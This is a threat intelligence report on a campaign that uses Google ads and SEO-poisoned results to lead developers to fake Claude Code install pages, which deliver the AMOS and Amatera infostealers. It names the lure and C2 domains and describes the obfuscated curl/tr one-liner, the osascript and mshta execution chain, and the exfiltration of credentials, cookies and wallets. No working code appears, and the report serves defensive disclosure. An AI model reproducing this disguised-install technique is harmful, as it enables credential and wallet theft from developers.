Malvertising & SEO Poisoning Exploit Claude Code Interest to Deliver Infostealers

Threat actors are exploiting trusted advertising real estate on Google Search to capitalize on growing developer interest in Anthropic's Claude Code. Sponsored ads and SEO-poisoned organic results redirect users to convincing fake installation pages hosted on legitimate platforms such as GitLab Pages and Bitbucket Pages, lending additional credibility to the lure. The fake documentation pages embed an InstallFix payload — a social engineering technique that tricks users into copying and executing a malicious terminal command disguised as a standard install step. Sandbox analysis of the claude-code-app[.]gitlab[.]io lure confirms clipboard hijacking behavior and an obfuscated curl command that decodes via tr substitution to resolve a C2 domain (jpbassin[.]com). A parallel lure page at claude-desktop-app[.]bitbucket[.]io was disclosed by community researcher @brkalbyrk7 as part of the same campaign. The abuse of Google's ad platform as the initial trust vector makes this particularly effective against technically sophisticated targets who expect sponsored results to be vetted.

The clipboard payload contains an obfuscated curl/base64 one-liner. Character substitution via tr decodes at runtime to reveal a C2 URL. The payload downloads and executes a platform-specific infostealer: AMOS on macOS via osascript and AppleScript, and Amatera on Windows via a PowerShell-to-mshta.exe HTA execution chain. Stolen data — including browser credentials, session cookies, Keychain contents, and cryptocurrency wallets — is exfiltrated to C2 infrastructure via HTTP POST with retry logic. The campaign demonstrates a convergence of malvertising, ClickFix-style social engineering, and multi-platform infostealer delivery, targeting the developer population specifically through tool installation workflows.